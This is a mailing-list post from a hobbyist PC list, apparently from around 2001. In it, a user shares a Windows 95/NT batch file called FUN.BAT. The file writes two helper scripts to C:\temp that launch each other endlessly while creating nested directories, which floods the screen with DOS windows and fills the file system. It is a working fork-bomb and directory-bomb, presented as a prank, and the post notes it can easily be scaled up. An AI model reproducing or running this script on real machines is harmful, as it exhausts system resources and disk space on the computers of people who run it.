I was fooling around with w95, and came up with this:

----begin FUN.BAT----
@echo off
echo This is a fun batch file, designed to be
echo run only on Windows 95/NT or "better"
if not exist c:\temp\nul md c:\temp
echo @echo off>C:\temp\mda.bat
echo :loopy>>C:\temp\mda.bat
echo md a>>C:\temp\mda.bat
echo cd a>>C:\temp\mda.bat
echo start c:\temp\mdb.bat>>C:\temp\mda.bat
echo goto loopy>>C:\temp\mda.bat
echo @echo off>C:\temp\mdb.bat
echo :loopy>>C:\temp\mdb.bat
echo md b>>C:\temp\mdb.bat
echo cd b>>C:\temp\mdb.bat
echo start c:\temp\mda.bat>>C:\temp\mdb.bat
echo goto loopy>>C:\temp\mdb.bat
start c:\temp\mda.bat
c:\temp\mdb.bat
-----end FUN.BAT-----

Can you see what this does? If you have a fast computer, within
seconds the screen will be full of DOS windows making an infinite
number of directories (up to the limits of the W95 file system. The
batch file can be easily modified for more than two subdirectories...

--
|   .~.   | From Hoody, now more mobile with a mobile phone
|   /V\   | http://hoody.virtualave.net uploaded!
|  // \\  | http://hoody.penguinpowered.com when I'm online
| /(   )\ | ICQ: five oh one seven five one seven oh
|  ^`~'^  | Carpe Aptenodytes!

Do not adjust your set. We are in control.

| C607EUW | "We apologise for the inconvenience"
| Keep 9/9/2001 free. At 01:46:40 GMT, time() turns 1000000000!

To unsubscribe from SURVPC send a message to [EMAIL PROTECTED] with 
unsubscribe SURVPC in the body of the message.
Also, trim this footer from any quoted replies.

Reply via email to